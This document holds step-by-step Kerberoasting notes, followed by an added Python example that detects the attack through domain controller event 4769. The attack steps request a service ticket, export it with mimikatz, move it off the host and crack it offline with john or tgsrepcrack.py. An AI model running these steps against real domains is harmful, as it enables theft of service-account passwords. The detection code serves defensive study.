Run steps 1 and 2 in PowerShell or cmd; this will generate the requested service ticket.

  1. Add-Type -AssemblyName System.IdentityModel

  2. New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>". To get the SPN, go to BloodHound > select service account > Node Info > SPN, or use PowerView with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

  3. Run mimikatz.exe, then privilege::debug

  4. kerberos::list /export, download service ticket

  5. exit to exit mimikatz

  6. dir to check the output, select the desired file and transfer it to your Linux machine (if netcat is used, transfer it in binary)

  7. kirbi2john <file> > hash.txt

  8. john hash.txt --wordlist=rockyou.txt

  1. Follow till step 5 to export the service ticket, then ./tgsrepcrack.py <wordlist> <.kirbi file>
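
On the defender's side, the service ticket request in step 2 is recorded on the domain controller as Security event 4769. The following is an added example, not part of the original notes: it filters constructed 4769 records for successful RC4 (0x17) tickets issued for user-backed services and groups them by requester. It assumes normal traffic in the domain uses AES; the realm, the IPs and every account name other than svc_tgs are made up.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # Kerberos etype 23, shown as 0x17 in event 4769

# Constructed sample records using field names from Security event 4769.
# Account names other than svc_tgs, the realm and the IPs are made up.
SAMPLE_EVENTS = [
    {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_tgs",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_tgs",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.9", "Status": "0x0"},
    {"TargetUserName": "carol@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.7", "Status": "0x0"},
    {"TargetUserName": "dave@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.8", "Status": "0x1b"},
]


def is_rc4_user_service_ticket(ev):
    """True for a successful RC4 ticket issued for a user-backed service."""
    service = ev["ServiceName"].lower()
    if service.endswith("$") or service == "krbtgt":
        return False  # skip machine accounts and krbtgt
    if int(ev["Status"], 16) != 0:
        return False  # failed requests issue no ticket
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def rc4_requests_by_requester(events):
    """Map (requesting account, source IP) -> sorted services requested with RC4."""
    hits = defaultdict(set)
    for ev in events:
        if is_rc4_user_service_ticket(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {who: sorted(services) for who, services in hits.items()}


if __name__ == "__main__":
    for (account, ip), services in rc4_requests_by_requester(SAMPLE_EVENTS).items():
        print(f"{account} from {ip}: {len(services)} RC4 service tickets -> {services}")
```

Event 4769 is only written when the "Audit Kerberos Service Ticket Operations" audit policy is enabled on the domain controllers.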